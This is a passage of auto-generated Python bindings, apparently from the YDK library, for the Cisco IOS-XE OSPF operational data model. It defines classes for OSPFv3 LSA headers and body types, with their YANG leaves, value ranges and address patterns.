<ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header.LsaHeader>` **config**\: False .. attribute:: lsa_hdr_options OSPFv3 LSA options **type**\: :py:class:`Ospfv3LsaOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaOptions>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header, self).__init__() self.yang_name = "header" self.yang_parent_name = "ospfv3-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("lsa-header", ("lsa_header", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header.LsaHeader))]) self._leafs = OrderedDict([ ('lsa_id', (YLeaf(YType.str, 'lsa-id'), ['str','str'])), ('lsa_hdr_options', (YLeaf(YType.bits, 'lsa-hdr-options'), ['Bits'])), ]) self.lsa_id = None self.lsa_hdr_options = Bits() self.lsa_header = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header.LsaHeader() self.lsa_header.parent = self self._children_name_map["lsa_header"] = "lsa-header" self._segment_path = lambda: "header" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header, ['lsa_id', 'lsa_hdr_options'], name, value) class LsaHeader(Entity): """ LSA header .. attribute:: age LSA age **type**\: int **range:** 0..65535 **config**\: False .. attribute:: type LSA type **type**\: int **range:** 0..65535 **config**\: False .. attribute:: adv_router LSA advertising router **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: seq_num LSA sequence number **type**\: str **config**\: False .. attribute:: checksum LSA checksum **type**\: str **config**\: False .. attribute:: length LSA length **type**\: int **range:** 0..65535 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header.LsaHeader, self).__init__() self.yang_name = "lsa-header" self.yang_parent_name = "header" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('age', (YLeaf(YType.uint16, 'age'), ['int'])), ('type', (YLeaf(YType.uint16, 'type'), ['int'])), ('adv_router', (YLeaf(YType.uint32, 'adv-router'), ['int'])), ('seq_num', (YLeaf(YType.str, 'seq-num'), ['str'])), ('checksum', (YLeaf(YType.str, 'checksum'), ['str'])), ('length', (YLeaf(YType.uint16, 'length'), ['int'])), ]) self.age = None self.type = None self.adv_router = None self.seq_num = None self.checksum = None self.length = None self._segment_path = lambda: "lsa-header" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header.LsaHeader, ['age', 'type', 'adv_router', 'seq_num', 'checksum', 'length'], name, value) class LsaBody(Entity): """ Decoded OSPFv3 LSA body .. attribute:: network OSPFv3 network **type**\: :py:class:`Network <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Network>` **config**\: False .. attribute:: prefix OSPFv3 inter area prefix **type**\: :py:class:`Prefix <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Prefix>` **config**\: False .. attribute:: ia_router OSPFv3 inter area router **type**\: :py:class:`IaRouter <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaRouter>` **config**\: False .. attribute:: lsa_external OSPFv3 LSA external **type**\: :py:class:`LsaExternal <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal>` **config**\: False .. attribute:: nssa OSPFv3 NSSA **type**\: :py:class:`Nssa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa>` **config**\: False .. attribute:: link_data OSPFv3 Link data **type**\: :py:class:`LinkData <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LinkData>` **config**\: False .. attribute:: ia_prefix OSPFv3 Intra area prefixes **type**\: :py:class:`IaPrefix <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaPrefix>` **config**\: False .. attribute:: lsa_flag_options LSA options **type**\: :py:class:`Ospfv3LsaOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaOptions>` **config**\: False .. attribute:: lsa_body_flags LSA Body Flags **type**\: :py:class:`Ospfv3LsaBodyFlagOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaBodyFlagOptions>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody, self).__init__() self.yang_name = "lsa-body" self.yang_parent_name = "ospfv3-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("network", ("network", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Network)), ("prefix", ("prefix", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Prefix)), ("ia-router", ("ia_router", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaRouter)), ("lsa-external", ("lsa_external", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal)), ("nssa", ("nssa", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa)), ("link-data", ("link_data", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LinkData)), ("ia-prefix", ("ia_prefix", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaPrefix))]) self._leafs = OrderedDict([ ('lsa_flag_options', (YLeaf(YType.bits, 'lsa-flag-options'), ['Bits'])), ('lsa_body_flags', (YLeaf(YType.bits, 'lsa-body-flags'), ['Bits'])), ]) self.lsa_flag_options = Bits() self.lsa_body_flags = Bits() self.network = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Network() self.network.parent = self self._children_name_map["network"] = "network" self.prefix = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Prefix() self.prefix.parent = self self._children_name_map["prefix"] = "prefix" self.ia_router = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaRouter() self.ia_router.parent = self self._children_name_map["ia_router"] = "ia-router" self.lsa_external = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal() self.lsa_external.parent = self self._children_name_map["lsa_external"] = "lsa-external" self.nssa = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa() self.nssa.parent = self self._children_name_map["nssa"] = "nssa" self.link_data = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LinkData() self.link_data.parent = self self._children_name_map["link_data"] = "link-data" self.ia_prefix = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaPrefix() self.ia_prefix.parent = self self._children_name_map["ia_prefix"] = "ia-prefix" self._segment_path = lambda: "lsa-body" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody, ['lsa_flag_options', 'lsa_body_flags'], name, value) class Network(Entity): """ OSPFv3 network .. attribute:: attached_router List of the routers attached to the network **type**\: list of int **range:** 0..4294967295 **config**\: False .. attribute:: lsa_net_options Network LSA options **type**\: :py:class:`Ospfv3LsaOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaOptions>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Network, self).__init__() self.yang_name = "network" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('attached_router', (YLeafList(YType.uint32, 'attached-router'), ['int'])), ('lsa_net_options', (YLeaf(YType.bits, 'lsa-net-options'), ['Bits'])), ]) self.attached_router = [] self.lsa_net_options = Bits() self._segment_path = lambda: "network" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Network, ['attached_router', 'lsa_net_options'], name, value) class Prefix(Entity): """ OSPFv3 inter area prefix .. attribute:: metric Metric **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: ia_prefix Inter area Prefix **type**\: str **config**\: False .. attribute:: ia_prefix_options Inter area prefix options **type**\: str **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Prefix, self).__init__() self.yang_name = "prefix" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])), ('ia_prefix', (YLeaf(YType.str, 'ia-prefix'), ['str'])), ('ia_prefix_options', (YLeaf(YType.str, 'ia-prefix-options'), ['str'])), ]) self.metric = None self.ia_prefix = None self.ia_prefix_options = None self._segment_path = lambda: "prefix" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Prefix, ['metric', 'ia_prefix', 'ia_prefix_options'], name, value) class IaRouter(Entity): """ OSPFv3 inter area router .. attribute:: metric Metric **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: destination_router_id Router ID of the router being described by the LSA **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: lsa_ia_options Inter area LSA options **type**\: :py:class:`Ospfv3LsaOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaOptions>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaRouter, self).__init__() self.yang_name = "ia-router" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])), ('destination_router_id', (YLeaf(YType.uint32, 'destination-router-id'), ['int'])), ('lsa_ia_options', (YLeaf(YType.bits, 'lsa-ia-options'), ['Bits'])), ]) self.metric = None self.destination_router_id = None self.lsa_ia_options = Bits() self._segment_path = lambda: "ia-router" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaRouter, ['metric', 'destination_router_id', 'lsa_ia_options'], name, value) class LsaExternal(Entity): """ OSPFv3 LSA external .. attribute:: metric Metric **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: flags LSA Flags **type**\: :py:class:`Flags <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal.Flags>` **config**\: False .. attribute:: referenced_ls_type Referenced Link State type **type**\: int **range:** 0..65535 **config**\: False .. attribute:: external_prefix Prefix **type**\: str **config**\: False .. attribute:: external_prefix_options Prefix options **type**\: str **config**\: False .. attribute:: forwarding_address Forwarding address **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: external_route_tag Route tag **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: referenced_link_state_id Referenced Link State ID **type**\: int **range:** 0..4294967295 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal, self).__init__() self.yang_name = "lsa-external" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("flags", ("flags", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal.Flags))]) self._leafs = OrderedDict([ ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])), ('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])), ('external_prefix', (YLeaf(YType.str, 'external-prefix'), ['str'])), ('external_prefix_options', (YLeaf(YType.str, 'external-prefix-options'), ['str'])), ('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])), ('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])), ('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])), ]) self.metric = None self.referenced_ls_type = None self.external_prefix = None self.external_prefix_options = None self.forwarding_address = None self.external_route_tag = None self.referenced_link_state_id = None self.flags = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal.Flags() self.flags.parent = self self._children_name_map["flags"] = "flags" self._segment_path = lambda: "lsa-external" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal, ['metric', 'referenced_ls_type', 'external_prefix', 'external_prefix_options', 'forwarding_address', 'external_route_tag', 'referenced_link_state_id'], name, value) class Flags(Entity): """ LSA Flags .. attribute:: e_flag When set, the metric specified is a Type 2 external metric **type**\: bool **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal.Flags, self).__init__() self.yang_name = "flags" self.yang_parent_name = "lsa-external" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('e_flag', (YLeaf(YType.boolean, 'e-flag'), ['bool'])), ]) self.e_flag = None self._segment_path = lambda: "flags" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal.Flags, ['e_flag'], name, value) class Nssa(Entity): """ OSPFv3 NSSA .. attribute:: lsa_nssa_external NSSA LSA **type**\: :py:class:`LsaNssaExternal <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa, self).__init__() self.yang_name = "nssa" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("lsa-nssa-external", ("lsa_nssa_external", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal))]) self._leafs = OrderedDict() self.lsa_nssa_external = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal() self.lsa_nssa_external.parent = self self._children_name_map["lsa_nssa_external"] = "lsa-nssa-external" self._segment_path = lambda: "nssa" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa, [], name, value) class LsaNssaExternal(Entity): """ NSSA LSA .. attribute:: metric Metric **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: flags LSA Flags **type**\: :py:class:`Flags <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags>` **config**\: False .. attribute:: referenced_ls_type Referenced Link State type **type**\: int **range:** 0..65535 **config**\: False .. attribute:: external_prefix Prefix **type**\: str **config**\: False .. attribute:: external_prefix_options Prefix options **type**\: str **config**\: False .. attribute:: forwarding_address Forwarding address **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: external_route_tag Route tag **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: referenced_link_state_id Referenced Link State ID **type**\: int **range:** 0..4294967295 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal, self).__init__() self.yang_name = "lsa-nssa-external" self.yang_parent_name = "nssa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("flags", ("flags", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags))]) self._leafs = OrderedDict([ ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])), ('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])), ('external_prefix', (YLeaf(YType.str, 'external-prefix'), ['str'])), ('external_prefix_options', (YLeaf(YType.str, 'external-prefix-options'), ['str'])), ('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])), ('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])), ('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])), ]) self.metric = None self.referenced_ls_type = None self.external_prefix = None self.external_prefix_options = None self.forwarding_address = None self.external_route_tag = None self.referenced_link_state_id = None self.flags = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags() self.flags.parent = self self._children_name_map["flags"] = "flags" self._segment_path = lambda: "lsa-nssa-external" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal, ['metric', 'referenced_ls_type', 'external_prefix', 'external_prefix_options', 'forwarding_address', 'external_route_tag', 'referenced_link_state_id'], name, value) class Flags(Entity): """ LSA Flags .. attribute:: e_flag When set, the metric specified is a Type 2 external metric **type**\: bool **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags, self).__init__() self.yang_name = "flags" self.yang_parent_name = "lsa-nssa-external" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('e_flag', (YLeaf(YType.boolean, 'e-flag'), ['bool'])), ]) self.e_flag = None self._segment_path = lambda: "flags" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags, ['e_flag'], name, value) class LinkData(Entity): """ OSPFv3 Link data .. attribute:: rtr_priority Router priority of the interce **type**\: int **range:** 0..255 **config**\: False .. attribute:: link_local_interface_address The originating router's link\-local interface address on the link **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: num_of_prefixes Number of prefixes **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: lsa_id_options Link data LSA options **type**\: :py:class:`Ospfv3LsaOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaOptions>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LinkData, self).__init__() self.yang_name = "link-data" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('rtr_priority', (YLeaf(YType.uint8, 'rtr-priority'), ['int'])), ('link_local_interface_address', (YLeaf(YType.str, 'link-local-interface-address'), ['str','str'])), ('num_of_prefixes', (YLeaf(YType.uint32, 'num-of-prefixes'), ['int'])), ('lsa_id_options', (YLeaf(YType.bits, 'lsa-id-options'), ['Bits'])), ]) self.rtr_priority = None self.link_local_interface_address = None self.num_of_prefixes = None self.lsa_id_options = Bits() self._segment_path = lambda: "link-data" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LinkData, ['rtr_priority', 'link_local_interface_address', 'num_of_prefixes', 'lsa_id_options'], name, value) class IaPrefix(Entity): """ OSPFv3 Intra area prefixes .. attribute:: referenced_ls_type Referenced Link State type **type**\: int **range:** 0..65535 **config**\: False .. attribute:: referenced_link_state_id Referenced Link State ID **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: referenced_adv_router Referenced Advertising Router **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: num_of_prefixes Number of prefixes **type**\: int **range:** 0..65535 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaPrefix, self).__init__() self.yang_name = "ia-prefix" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])), ('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])), ('referenced_adv_router', (YLeaf(YType.str, 'referenced-adv-router'), ['str','str'])), ('num_of_prefixes', (YLeaf(YType.uint16, 'num-of-prefixes'), ['int'])), ]) self.referenced_ls_type = None self.referenced_link_state_id = None self.referenced_adv_router = None self.num_of_prefixes = None self._segment_path = lambda: "ia-prefix" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaPrefix, ['referenced_ls_type', 'referenced_link_state_id', 'referenced_adv_router', 'num_of_prefixes'], name, value) class Ospfv3Link(Entity): """ OSPFv3 links .. attribute:: interface_id (key) Interface ID **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: neighbor_interface_id (key) Neighbor interface ID **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: neighbor_router_id (key) 